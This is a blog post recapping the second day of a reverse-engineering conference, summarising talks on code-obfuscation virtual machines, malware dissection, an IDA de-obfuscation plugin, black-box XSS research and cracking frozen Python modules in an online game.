Some more interesting talks on the second day of the con. Craig Smith from Neohapsis gave an informative presentation on creating a custom code obfuscation virtual machine. The usage of a custom VM to obfuscate code has mostly been seen in various crackme's though it is starting to gain popularity in malware. There are legitimate commercial code virtualizers like Themida. This was an interesting talk and thought exercise that captured the attention of many attendees. Craig's slides and code are available from http://labs.neohapsis.com.

There was an open slot after lunch today which was filled by Nicolas Brulez. Hugo essentially threw Nicolas under the bus on this one asking him to pull together an interesting last minute talk ... naturally Nicolas pulled it off just fine. He walked the crowd through the dissection of an armored and polymorphic real-world virus sample. One of the more interesting aspects of the sample is that it was capable of crashing VMWare version 5 from within the VM.

Eric Laspe walked through a series of screenshots and function descriptions of an IDA code de-obfuscator plugin. The plugin scans the current database looking for common code obfuscation patterns and utilizes emulation to simplify the code and control flow. Eric demonstrated the benefits of the tool with a before and after call-graph of the RustockB virus. Most unfortunately it does not look like the plugin will be released either commercially or freely. I must say that is quite frustrating if this is the case. If you insist on spending an hour discussing a tool that will never see the light of day then at least focus the talk on the underlying theories and algorithms instead of teasing the crowd with unusable visuals.

Alexander Sotirov is a thorough researcher and excellent presenter, he spoke on black box reverse engineering of web applications cross-site scripting vulnerabilities. Alex made some points at the start of his talk that resonates strongly with what I've been feeling for some time now, that the future of security auditing is in the web. He presented some techniques for blindly identifying and abusing filter rules and will be releasing a script he wrote to help in the automation process. Alex discovered a pretty critical XSS vulnerability which took Facebook two iterations and one month to fix. He also dropped an 0day which affects only Firefox < 2.0.0.2 users. The bugs are available at http://apps.facebook.com/zuckerbug.

Aaron and Ali closed the day out with their talk on reverse engineering dynamic languages, which focused on static and runtime techniques for manipulating "frozen" Python modules (.pyd files). This research project was essentially kicked off a few months ago when I started playing around with Disney's Pirates of the Carribean MMORPG and immediately wanted to cheat. The bulk of the game is written in Python and served as an excellent case study. Aaron and Ali walked the crowd through various Python internals, tips and tricks. A GUI tool for de/re compilation of frozen Python modules was written in the process called AntiFreeze which will be released soon. The pair closed out their talk with hilarious screenshots, videos and a live demonstration of the various cheats in action. Check back on this site in a couple of days and we should have videos and screenshots posted.